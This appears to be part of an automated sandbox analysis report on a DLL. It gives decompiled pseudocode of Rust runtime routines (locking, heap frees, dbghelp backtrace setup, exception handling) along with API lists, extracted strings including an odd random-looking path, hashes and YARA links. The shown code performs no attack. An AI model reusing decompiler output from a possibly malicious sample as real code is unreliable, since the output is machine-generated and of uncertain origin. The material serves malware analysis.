											 *((intOrPtr*)( *((intOrPtr*)(_t324 + 4))))( *_t324);
											_t348 = _t348 + 4;
											_t343 = _v40;
											_t300 =  *((intOrPtr*)(_t343 + 4));
											if( *((intOrPtr*)(_t300 + 4)) != 0) {
												_t248 =  *_t343;
												if( *((intOrPtr*)(_t300 + 8)) >= 9) {
													_t248 =  *(_t248 - 4);
												}
												HeapFree( *0x6e4fadc8, 0, _t248);
											}
											HeapFree( *0x6e4fadc8, 0, _t343);
										}
										_t269 = _v128;
										_t222 =  <  ? (_t269 + 0x000000fd & 0x000000ff) + 1 : 0;
										if(_t222 == 0) {
											__imp__AcquireSRWLockExclusive(0x6e4fadac);
											_v68 = 0x6e4ed2c0;
											_v64 = 1;
											_v152 = 0x6e4fadac;
											_v41 = _t269;
											_v60 = 0;
											_v20 = 6;
											_v124 =  &_v41;
											_v120 = E6E4ADEE0;
											_v52 =  &_v124;
											_v48 = 1;
											_t225 = E6E4AD2A0( &_v92, __eflags);
											_t341 =  &_v68;
											__imp__ReleaseSRWLockExclusive(0x6e4fadac);
											__eflags = _t225 - 3;
											if(__eflags != 0) {
												goto L95;
											}
											_v20 = 5;
											_v40 = _t341;
											 *((intOrPtr*)( *((intOrPtr*)(_t341 + 4))))( *_t341);
											_t348 = _t348 + 4;
											goto L90;
										} else {
											if(_t222 == 1) {
												L95:
												_t372 = _v36;
												if(_t372 != 0) {
													asm("lock dec dword [eax]");
													if(_t372 == 0) {
														E6E4AC800(_v84);
													}
												}
												_t342 = _v140;
												_t338 = _v136;
												_t373 = _v72;
												if(_t373 != 0) {
													asm("lock dec dword [eax]");
													if(_t373 == 0) {
														E6E4ADC20(_v72);
													}
												}
												__imp__ReleaseSRWLockShared(0x6e4fadbc);
												_t374 = _v132 - 1;
												_v20 = 0xffffffff;
												if(_v132 > 1) {
													_v68 = 0x6e4eda8c;
													_v64 = 1;
													_v60 = 0;
													_v52 = 0x6e4ecd60;
													_v76 = 0;
													_v80 = 0;
													_v48 = 0;
													_t229 = E6E4AD2A0( &_v80, _t374);
													_v120 =  &_v68;
													_v124 = _t229;
													E6E4AD460( &_v124);
													asm("ud2");
													asm("ud2");
												}
												_t285 = _t338;
												E6E4AD440(_t285, _t342);
												asm("ud2");
												goto L104;
											}
											 *0x6e4fa040 = 0;
											_t368 =  *0x6e4fa040;
											if( *0x6e4fa040 == 0) {
												goto L95;
											}
											_t330 =  &_v68;
											_v68 = 0x6e4ed96c;
											_v64 = 1;
											_v60 = 0;
											_v52 = 0x6e4ecd60;
											_v48 = 0;
											_v20 = 3;
											if(E6E4AD2A0( &_v92, _t368) != 3) {
												goto L95;
											}
											_v40 = _t330;
											_v20 = 4;
											 *((intOrPtr*)( *((intOrPtr*)(_t330 + 4))))( *_t330);
											_t348 = _t348 + 4;
											L90:
											_t296 =  *((intOrPtr*)(_v40 + 4));
											if( *((intOrPtr*)(_t296 + 4)) != 0) {
												_t238 =  *_v40;
												if( *((intOrPtr*)(_t296 + 8)) >= 9) {
													_t238 =  *(_t238 - 4);
												}
												HeapFree( *0x6e4fadc8, 0, _t238);
											}
											HeapFree( *0x6e4fadc8, 0, _v40);
											goto L95;
										}
									}
									_t213 = 0;
									goto L105;
								}
								_t213 = 0;
								goto L48;
							}
						}
					}
				}
			}

































































































                          0x6e4ac897
                          0x6e4ac89a
                          0x6e4ac89e
                          0x6e4ac8a5
                          0x6e4ac8a6
                          0x6e4ac8a8
                          0x6e4ac8ad
                          0x6e4ac8b0
                          0x6e4ac8b2
                          0x6e4ac8b3
                          0x6e4ac8b4
                          0x6e4ac8b5
                          0x6e4ac8b6
                          0x6e4ac8b7
                          0x6e4ac8b8
                          0x6e4ac8b9
                          0x6e4ac8ba
                          0x6e4ac8bb
                          0x6e4ac8bc
                          0x6e4ac8bd
                          0x6e4ac8be
                          0x6e4ac8bf
                          0x6e4ac8c6
                          0x6e4ac8cc
                          0x6e4ac8cf
                          0x6e4ac8d6
                          0x6e4ac8dd
                          0x6e4ac8e2
                          0x6e4ac8e7
                          0x6e4ac8f0
                          0x6e4ac8f3
                          0x6e4ac8f9
                          0x6e4ac901
                          0x6e4ac906
                          0x6e4ac908
                          0x6e4ac922
                          0x6e4ac927
                          0x6e4ac92a
                          0x6e4ac92a
                          0x6e4ac92e
                          0x6e4ac931
                          0x6e4ac934
                          0x6e4ac936
                          0x6e4ac9aa
                          0x6e4ac9ad
                          0x6e4aca0a
                          0x6e4aca11
                          0x6e4aca1b
                          0x6e4aca22
                          0x6e4aca29
                          0x6e4aca2d
                          0x6e4aca34
                          0x6e4aca3b
                          0x6e4aca41
                          0x6e4aca44
                          0x6e4aca47
                          0x6e4aca4d
                          0x6e4aca54
                          0x6e4aca57
                          0x6e4aca5e
                          0x6e4aca63
                          0x6e4aca65
                          0x6e4aca6c
                          0x6e4aca74
                          0x6e4aca77
                          0x6e4aca79
                          0x6e4aca7c
                          0x6e4aca7c
                          0x6e4aca7f
                          0x6e4aca82
                          0x6e4aca86
                          0x6e4aca9c
                          0x6e4aca9c
                          0x6e4acaaa
                          0x6e4acaaa
                          0x00000000
                          0x6e4aca65
                          0x6e4ac9b2
                          0x6e4ac9b5
                          0x6e4ac9bc
                          0x6e4ac9c3
                          0x6e4ac9ca
                          0x6e4ac9d1
                          0x6e4ac9d5
                          0x6e4ac9dc
                          0x6e4ac9e3
                          0x6e4ac9e8
                          0x6e4ac9ea
                          0x00000000
                          0x6e4ac9f0
                          0x6e4ac9f5
                          0x6e4ac9fd
                          0x6e4aca00
                          0x6e4aca02
                          0x00000000
                          0x6e4aca02
                          0x6e4ac93d
                          0x6e4ac93d
                          0x6e4ac945
                          0x6e4ac94b
                          0x6e4ac955
                          0x6e4ac95c
                          0x6e4ac963
                          0x6e4ac969
                          0x6e4ac96c
                          0x6e4ac96f
                          0x6e4ac972
                          0x6e4ac975
                          0x6e4ac97a
                          0x6e4ac97d
                          0x6e4ac97f
                          0x6e4acab3
                          0x6e4acab3
                          0x6e4acab6
                          0x6e4acab8
                          0x6e4acb8b
                          0x6e4acb90
                          0x6e4acb93
                          0x6e4acb96
                          0x6e4acd97
                          0x00000000
                          0x6e4acd97
                          0x6e4acb9c
                          0x6e4acb9f
                          0x6e4acd90
                          0x00000000
                          0x6e4acd90
                          0x6e4acba5
                          0x6e4acba7
                          0x00000000
                          0x00000000
                          0x6e4acbb0
                          0x6e4acbb5
                          0x6e4acbb8
                          0x6e4acbbb
                          0x6e4acbbd
                          0x00000000
                          0x00000000
                          0x6e4acbc3
                          0x00000000
                          0x6e4acbc3
                          0x6e4acabe
                          0x00000000
                          0x6e4ac985
                          0x6e4ac99d
                          0x6e4ac9a2
                          0x6e4acdbe
                          0x6e4acdbe
                          0x6e4acdc0
                          0x6e4acdc0
                          0x6e4acdc5
                          0x6e4acaf3
                          0x6e4acaf3
                          0x6e4acaf6
                          0x6e4acaf9
                          0x6e4acb00
                          0x6e4acb02
                          0x6e4acb07
                          0x6e4acb07
                          0x6e4acb0d
                          0x6e4acb16
                          0x6e4acbf3
                          0x6e4acbf3
                          0x6e4acbf8
                          0x6e4acbfa
                          0x6e4acbfc
                          0x6e4acc01
                          0x6e4acc01
                          0x6e4acc07
                          0x6e4acc0d
                          0x6e4acc0f
                          0x6e4acdcf
                          0x6e4acdd4
                          0x6e4acdd6
                          0x6e4acde6
                          0x6e4acdeb
                          0x6e4acdf0
                          0x6e4acdf2
                          0x6e4ace32
                          0x6e4ace38
                          0x6e4ace3f
                          0x6e4ace41
                          0x6e4ace46
                          0x6e4ace48
                          0x6e4ace4f
                          0x6e4ace52
                          0x6e4ace57
                          0x6e4ace57
                          0x6e4ace5c
                          0x00000000
                          0x6e4ace5c
                          0x6e4acdf4
                          0x6e4acdfe
                          0x6e4ace03
                          0x6e4ace05
                          0x6e4ace05
                          0x6e4ace08
                          0x6e4ace0b
                          0x6e4ace0e
                          0x6e4aceb8
                          0x6e4acebe
                          0x6e4acec9
                          0x6e4acec9
                          0x6e4acece
                          0x6e4acece
                          0x6e4aced0
                          0x6e4aced0
                          0x6e4aced2
                          0x6e4acedd
                          0x6e4acedd
                          0x6e4acee2
                          0x6e4acee2
                          0x6e4aceed
                          0x6e4acef5
                          0x6e4acef8
                          0x6e4acefb
                          0x6e4acefb
                          0x6e4acefb
                          0x6e4acac1
                          0x6e4acac1
                          0x6e4acac7
                          0x6e4acaca
                          0x6e4acaca
                          0x6e4acad0
                          0x6e4acad3
                          0x6e4acad5
                          0x6e4acae3
                          0x6e4acae3
                          0x6e4acae5
                          0x6e4acbcd
                          0x6e4acbd0
                          0x6e4acbde
                          0x6e4acbe0
                          0x00000000
                          0x00000000
                          0x6e4acbe6
                          0x6e4acbe9
                          0x6e4acbeb
                          0x00000000
                          0x6e4acbeb
                          0x6e4acaeb
                          0x6e4acaee
                          0x6e4acaf0
                          0x00000000
                          0x6e4acaf0
                          0x6e4acec0
                          0x6e4acec2
                          0x00000000
                          0x6e4acec2
                          0x6e4ace14
                          0x6e4ace17
                          0x00000000
                          0x00000000
                          0x6e4ace1d
                          0x6e4ace20
                          0x00000000
                          0x00000000
                          0x6e4ace26
                          0x6e4ace28
                          0x00000000
                          0x6e4ace28
                          0x6e4acdd8
                          0x6e4acddd
                          0x6e4acddf
                          0x00000000
                          0x00000000
                          0x6e4acde1
                          0x00000000
                          0x6e4acc15
                          0x6e4acc15
                          0x6e4acc17
                          0x6e4acc1a
                          0x6e4ace62
                          0x6e4ace62
                          0x6e4ace65
                          0x6e4ace68
                          0x6e4ace68
                          0x6e4ace6b
                          0x6e4ace71
                          0x6e4ace78
                          0x6e4ace7f
                          0x6e4ace85
                          0x6e4ace87
                          0x6e4ace8d
                          0x6e4ace90
                          0x6e4ace96
                          0x6e4ace96
                          0x6e4ace90
                          0x6e4ace87
                          0x00000000
                          0x6e4ace7f
                          0x6e4acc20
                          0x6e4acc27
                          0x6e4acc2e
                          0x6e4acc2e
                          0x00000000
                          0x6e4acc2e
                          0x6e4acb1c
                          0x6e4acb1f
                          0x6e4acb21
                          0x00000000
                          0x00000000
                          0x6e4acb27
                          0x6e4acb2a
                          0x6e4acb2d
                          0x6e4acdb6
                          0x6e4acdbb
                          0x00000000
                          0x6e4acdbb
                          0x6e4acb33
                          0x6e4acb39
                          0x6e4acb3e
                          0x6e4acb40
                          0x6e4acb43
                          0x6e4acb4a
                          0x6e4acb4f
                          0x6e4acb52
                          0x6e4acb54
                          0x6e4acb57
                          0x6e4acb59
                          0x6e4acb5b
                          0x6e4acb5e
                          0x6e4acb60
                          0x6e4acb63
                          0x6e4acb63
                          0x6e4acb5e
                          0x6e4acb68
                          0x6e4acb68
                          0x6e4acb6b
                          0x6e4acb6e
                          0x6e4acaaf
                          0x6e4acaaf
                          0x6e4acab1
                          0x00000000
                          0x6e4acb74
                          0x6e4acb74
                          0x6e4acb78
                          0x6e4acb7b
                          0x6e4acb7e
                          0x6e4acea0
                          0x6e4acea6
                          0x6e4acea8
                          0x6e4aceab
                          0x6e4ad062
                          0x6e4ad062
                          0x6e4ad067
                          0x6e4ad068
                          0x6e4ad068
                          0x6e4acc30
                          0x6e4acc37
                          0x6e4acc3e
                          0x6e4acc45
                          0x6e4acc4c
                          0x6e4acc50
                          0x6e4acc57
                          0x6e4acc5e
                          0x6e4acc65
                          0x6e4acc6d
                          0x6e4acc70
                          0x6e4acc76
                          0x6e4acc79
                          0x6e4acc7f
                          0x6e4acc85
                          0x6e4acc8c
                          0x6e4acc95
                          0x6e4acc9c
                          0x6e4acca2
                          0x6e4acca9
                          0x6e4accac
                          0x6e4accba
                          0x6e4accc1
                          0x6e4accc9
                          0x6e4acccc
                          0x6e4accce
                          0x6e4accd1
                          0x6e4accd4
                          0x6e4accdb
                          0x6e4accdd
                          0x6e4acce3
                          0x6e4acce5
                          0x6e4acce5
                          0x6e4accf1
                          0x6e4accf1
                          0x6e4accff
                          0x6e4accff
                          0x6e4acd04
                          0x6e4acd15
                          0x6e4acd1a
                          0x6e4acf0b
                          0x6e4acf1a
                          0x6e4acf21
                          0x6e4acf28
                          0x6e4acf32
                          0x6e4acf35
                          0x6e4acf3c
                          0x6e4acf43
                          0x6e4acf49
                          0x6e4acf50
                          0x6e4acf53
                          0x6e4acf5a
                          0x6e4acf5f
                          0x6e4acf68
                          0x6e4acf6e
                          0x6e4acf71
                          0x00000000
                          0x00000000
                          0x6e4acf78
                          0x6e4acf80
                          0x6e4acf83
                          0x6e4acf85
                          0x00000000
                          0x6e4acd20
                          0x6e4acd23
                          0x6e4acfc0
                          0x6e4acfc3
                          0x6e4acfc5
                          0x6e4acfc7
                          0x6e4acfca
                          0x6e4acfcf
                          0x6e4acfcf
                          0x6e4acfca
                          0x6e4acfd7
                          0x6e4acfdd
                          0x6e4acfe3
                          0x6e4acfe5
                          0x6e4acfe7
                          0x6e4acfea
                          0x6e4acfef
                          0x6e4acfef
                          0x6e4acfea
                          0x6e4acff9
                          0x6e4acfff
                          0x6e4ad003
                          0x6e4ad00a
                          0x6e4ad012
                          0x6e4ad019
                          0x6e4ad020
                          0x6e4ad027
                          0x6e4ad02e
                          0x6e4ad032
                          0x6e4ad039
                          0x6e4ad040
                          0x6e4ad048
                          0x6e4ad04b
                          0x6e4ad04e
                          0x6e4ad053
                          0x6e4ad055
                          0x6e4ad055
                          0x6e4ad057
                          0x6e4ad05b
                          0x6e4ad060
                          0x00000000
                          0x6e4ad060
                          0x6e4acd2b
                          0x6e4acd31
                          0x6e4acd33
                          0x00000000
                          0x00000000
                          0x6e4acd3c
                          0x6e4acd3f
                          0x6e4acd46
                          0x6e4acd4d
                          0x6e4acd54
                          0x6e4acd5b
                          0x6e4acd62
                          0x6e4acd70
                          0x00000000
                          0x00000000
                          0x6e4acd7b
                          0x6e4acd7e
                          0x6e4acd86
                          0x6e4acd88
                          0x6e4acf88
                          0x6e4acf8b
                          0x6e4acf92
                          0x6e4acf9b
                          0x6e4acf9d
                          0x6e4acf9f
                          0x6e4acf9f
                          0x6e4acfab
                          0x6e4acfab
                          0x6e4acfbb
                          0x00000000
                          0x6e4acfbb
                          0x6e4acd1a
                          0x6e4aceb1
                          0x00000000
                          0x6e4aceb1
                          0x6e4acb84
                          0x00000000
                          0x6e4acb84
                          0x6e4acb6e
                          0x6e4acb16
                          0x6e4ac97f

                          APIs
                            • Part of subcall function 6E4AC8C0: AcquireSRWLockShared.KERNEL32(6E4FADBC), ref: 6E4AC945
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6E4ACA9C
                          • HeapFree.KERNEL32(00000000,?), ref: 6E4ACAAA
                          • TlsGetValue.KERNEL32(00000000), ref: 6E4ACB0D
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6E4ACCF1
                          • HeapFree.KERNEL32(00000000,?), ref: 6E4ACCFF
                          Strings
                          • cannot access a Thread Local Storage value during or after destructionC:jhdokdvbachceydqtheqlppakhgzijyekeivcljjvbkvyjmwyqejgcsvnqcbhbexvfcyaikjiycwgbjpytkvctpgymeigmgnvityoxcirvtcevutdotfqbgtduf, xrefs: 6E4AC90D, 6E4AC988
                          • Y3Kn, xrefs: 6E4AC8C5
                          • Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6E4ACDC0
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FreeHeap$AcquireLockSharedValue
                          • String ID: Box<dyn Any><unnamed>thread '' panicked at '', $Y3Kn$cannot access a Thread Local Storage value during or after destructionC:jhdokdvbachceydqtheqlppakhgzijyekeivcljjvbkvyjmwyqejgcsvnqcbhbexvfcyaikjiycwgbjpytkvctpgymeigmgnvityoxcirvtcevutdotfqbgtduf
                          • API String ID: 942675266-1450440702
                          • Opcode ID: 3021220d23c788e73a7696b2c1bea547bd2c99734784ed09e0d92cf6fe8aa35b
                          • Instruction ID: d0be8092e2157e0966223d7f5957c282441ed52d31dcfd4ce53cc7cd77d8b5d2
                          • Opcode Fuzzy Hash: 3021220d23c788e73a7696b2c1bea547bd2c99734784ed09e0d92cf6fe8aa35b
                          • Instruction Fuzzy Hash: AE0235B0900209CFDB50CFF8C844B9EBBB5BF59729F10851ADA15AB384D776A946CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4AE690, Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 135libraryloadersynchronizationCOMMON
                          Download Yara Rule
                          C-Code - Quality: 52%
                          			E6E4AE690(void* __ebx, void* __edi, void* __esi, char _a8) {
				int _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* __ebp;
				void* _t15;
				struct HINSTANCE__* _t20;
				signed int _t21;
				void* _t23;
				_Unknown_base(*)()* _t25;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t30;
				void* _t35;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t39;
				signed int _t50;
				_Unknown_base(*)()* _t52;
				void* _t59;

				_t48 = __edi;
				_push(__edi);
				_v32 = _t59 - 0x14;
				_v20 = 0xffffffff;
				_v24 = E6E4B3BA0;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t35 =  *0x6e4fadc4; // 0x0
				if(_t35 == 0) {
					_t15 = CreateMutexA(0, 0, "Local\\RustBacktraceMutex");
					__eflags = _t15;
					if(_t15 == 0) {
						_t54 = 1;
						goto L19;
					} else {
						_t35 = _t15;
						__eflags = 0;
						asm("lock cmpxchg [0x6e4fadc4], ebx");
						if(0 != 0) {
							CloseHandle(_t35);
							_t35 = 0;
						}
						goto L1;
					}
				} else {
					L1:
					WaitForSingleObjectEx(_t35, 0xffffffff, 0);
					_t20 =  *0x6e4fadd0; // 0x0
					if(_t20 != 0) {
						L3:
						_t54 = 0;
						if( *0x6e4fae04 != 0) {
							goto L19;
						} else {
							_t38 =  *0x6e4fadd4; // 0x0
							if(_t38 != 0) {
								L7:
								_t21 =  *_t38();
								_t39 =  *0x6e4fadd8; // 0x0
								_t50 = _t21;
								if(_t39 != 0) {
									L10:
									 *_t39(_t50 | 0x00000004);
									_t52 =  *0x6e4faddc; // 0x0
									if(_t52 != 0) {
										L13:
										_t23 = GetCurrentProcess();
										 *_t52(_t23, 0, 1);
										 *0x6e4fae04 = 1;
										goto L19;
									} else {
										_t25 = GetProcAddress( *0x6e4fadd0, "SymInitializeW");
										if(_t25 == 0) {
											_v36 = _t35;
											_v20 = 0;
											E6E4C6E20(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t52, _t54, __eflags, 0x6e4edcac);
											goto L23;
										} else {
											_t52 = _t25;
											 *0x6e4faddc = _t25;
											goto L13;
										}
									}
								} else {
									_t28 = GetProcAddress( *0x6e4fadd0, "SymSetOptions");
									if(_t28 == 0) {
										_v36 = _t35;
										_v20 = 0;
										E6E4C6E20(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t50, _t54, __eflags, 0x6e4edc9c);
										goto L23;
									} else {
										_t39 = _t28;
										 *0x6e4fadd8 = _t28;
										goto L10;
									}
								}
							} else {
								_t30 = GetProcAddress(_t20, "SymGetOptions");
								if(_t30 == 0) {
									_v36 = _t35;
									_v20 = 0;
									E6E4C6E20(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t48, 0, __eflags, 0x6e4edc8c);
									L23:
									asm("ud2");
									__eflags =  &_a8;
									return E6E4AE880(_v36);
								} else {
									_t38 = _t30;
									 *0x6e4fadd4 = _t30;
									goto L7;
								}
							}
						}
					} else {
						_t20 = LoadLibraryA("dbghelp.dll");
						 *0x6e4fadd0 = _t20;
						if(_t20 == 0) {
							ReleaseMutex(_t35);
							_t54 = 1;
							L19:
							 *[fs:0x0] = _v28;
							return _t54;
						} else {
							goto L3;
						}
					}
				}
			}






















                          0x6e4ae690
                          0x6e4ae694
                          0x6e4ae699
                          0x6e4ae69c
                          0x6e4ae6a3
                          0x6e4ae6b4
                          0x6e4ae6b7
                          0x6e4ae6bd
                          0x6e4ae6c5
                          0x6e4ae7a5
                          0x6e4ae7aa
                          0x6e4ae7ac
                          0x6e4ae7d0
                          0x00000000
                          0x6e4ae7ae
                          0x6e4ae7ae
                          0x6e4ae7b0
                          0x6e4ae7b2
                          0x6e4ae7ba
                          0x6e4ae7c3
                          0x6e4ae7c9
                          0x6e4ae7c9
                          0x00000000
                          0x6e4ae7ba
                          0x6e4ae6cb
                          0x6e4ae6cb
                          0x6e4ae6d0
                          0x6e4ae6d5
                          0x6e4ae6dc
                          0x6e4ae6f5
                          0x6e4ae6f5
                          0x6e4ae6fe
                          0x00000000
                          0x6e4ae704
                          0x6e4ae704
                          0x6e4ae70c
                          0x6e4ae729
                          0x6e4ae729
                          0x6e4ae72b
                          0x6e4ae731
                          0x6e4ae735
                          0x6e4ae757
                          0x6e4ae75b
                          0x6e4ae75d
                          0x6e4ae765
                          0x6e4ae787
                          0x6e4ae787
                          0x6e4ae791
                          0x6e4ae793
                          0x00000000
                          0x6e4ae767
                          0x6e4ae772
                          0x6e4ae77a
                          0x6e4ae83d
                          0x6e4ae840
                          0x6e4ae856
                          0x00000000
                          0x6e4ae780
                          0x6e4ae780
                          0x6e4ae782
                          0x00000000
                          0x6e4ae782
                          0x6e4ae77a
                          0x6e4ae737
                          0x6e4ae742
                          0x6e4ae74a
                          0x6e4ae81a
                          0x6e4ae81d
                          0x6e4ae833
                          0x00000000
                          0x6e4ae750
                          0x6e4ae750
                          0x6e4ae752
                          0x00000000
                          0x6e4ae752
                          0x6e4ae74a
                          0x6e4ae70e
                          0x6e4ae714
                          0x6e4ae71c
                          0x6e4ae7f7
                          0x6e4ae7fa
                          0x6e4ae810
                          0x6e4ae85e
                          0x6e4ae85e
                          0x6e4ae864
                          0x6e4ae873
                          0x6e4ae722
                          0x6e4ae722
                          0x6e4ae724
                          0x00000000
                          0x6e4ae724
                          0x6e4ae71c
                          0x6e4ae70c
                          0x6e4ae6de
                          0x6e4ae6e3
                          0x6e4ae6ea
                          0x6e4ae6ef
                          0x6e4ae7d8
                          0x6e4ae7dd
                          0x6e4ae7e2
                          0x6e4ae7e7
                          0x6e4ae7f6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4ae6ef
                          0x6e4ae6dc

                          APIs
                          • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6E4AE6D0
                          • LoadLibraryA.KERNEL32(dbghelp.dll,00000000,000000FF,00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6E4AE6E3
                          • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 6E4AE714
                          • GetProcAddress.KERNEL32(SymSetOptions), ref: 6E4AE742
                          • GetProcAddress.KERNEL32(SymInitializeW), ref: 6E4AE772
                          • GetCurrentProcess.KERNEL32 ref: 6E4AE787
                          • CreateMutexA.KERNEL32(00000000,00000000,Local\RustBacktraceMutex), ref: 6E4AE7A5
                          • CloseHandle.KERNEL32(00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6E4AE7C3
                            • Part of subcall function 6E4AE880: ReleaseMutex.KERNEL32(?,6E4AE5F8), ref: 6E4AE881
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressProc$Mutex$CloseCreateCurrentHandleLibraryLoadObjectProcessReleaseSingleWait
                          • String ID: Local\RustBacktraceMutex$SymGetOptions$SymInitializeW$SymSetOptions$called `Option::unwrap()` on a `None` value$dbghelp.dll
                          • API String ID: 1067696788-3213342004
                          • Opcode ID: ac947e6aa8f1fea4d29174821f5974fdaca2396cc0fe8b553fac48da328a6352
                          • Instruction ID: 85535744fdb302dcbeec8bb69b4611428d70738d99b1fa6b4b1ee1ac0418df33
                          • Opcode Fuzzy Hash: ac947e6aa8f1fea4d29174821f5974fdaca2396cc0fe8b553fac48da328a6352
                          • Instruction Fuzzy Hash: E9417974E002409BDF00AFF9ECD4F6A37AAAB95B25F00053FE2169B384D77198418BA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4BD036, Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 304COMMON
                          Download Yara Rule
                          C-Code - Quality: 64%
                          			E6E4BD036(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t202;
				signed int _t203;
				char _t204;
				signed int _t206;
				signed int _t208;
				signed char* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t215;
				void* _t218;
				signed char* _t221;
				void* _t223;
				void* _t225;
				signed char _t229;
				signed int _t230;
				void* _t232;
				void* _t235;
				void* _t238;
				signed char _t245;
				signed int _t250;
				void* _t253;
				signed int* _t255;
				signed int _t256;
				intOrPtr _t257;
				signed int _t258;
				void* _t263;
				void* _t268;
				void* _t269;
				signed int _t273;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed char* _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t305;
				signed char* _t308;
				signed int _t318;
				signed int _t319;
				signed int _t321;
				signed int _t330;
				void* _t332;
				void* _t334;
				void* _t335;
				void* _t336;
				void* _t337;

				_t300 = __edx;
				_push(_t319);
				_t305 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t279 = E6E4BDF98(_a8, _a16, _t305);
				_t335 = _t334 + 0xc;
				_v12 = _t279;
				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
					L66:
					_t202 = E6E4BF563(_t274, _t279, _t300, _t305, _t319);
					asm("int3");
					_t332 = _t335;
					_t336 = _t335 - 0x38;
					_push(_t274);
					_t275 = _v112;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t202;
					} else {
						_push(_t319);
						_push(_t305);
						_t203 = E6E4BCCF1(_t275, _t279, _t300, _t305, _t319);
						__eflags =  *(_t203 + 8);
						if( *(_t203 + 8) != 0) {
							__imp__EncodePointer(0);
							_t319 = _t203;
							_t223 = E6E4BCCF1(_t275, _t279, _t300, 0, _t319);
							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t215 = E6E4BC537(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t336 = _t336 + 0x1c;
										__eflags = _t215;
										if(_t215 != 0) {
											L83:
											return _t215;
										}
									}
								}
							}
						}
						_t204 = _a16;
						_v28 = _t204;
						_v24 = 0;
						__eflags =  *(_t204 + 0xc);
						if( *(_t204 + 0xc) > 0) {
							_push(_a24);
							E6E4BC46A(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
							_t302 = _v40;
							_t337 = _t336 + 0x18;
							_t215 = _v44;
							_v20 = _t215;
							_v12 = _t302;
							__eflags = _t302 - _v32;
							if(_t302 >= _v32) {
								goto L83;
							}
							_t281 = _t302 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
								_t337 = _t337 + 0xc;
								__eflags = _v64 - _t218;
								if(_v64 > _t218) {
									goto L82;
								}
								__eflags = _t218 - _v60;
								if(_t218 > _v60) {
									goto L82;
								}
								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t221[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L80:
									__eflags =  *_t221 & 0x00000040;
									if(( *_t221 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E6E4BCFB6(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
										_t302 = _v12;
										_t337 = _t337 + 0x30;
									}
									goto L82;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L82;
								}
								goto L80;
								L82:
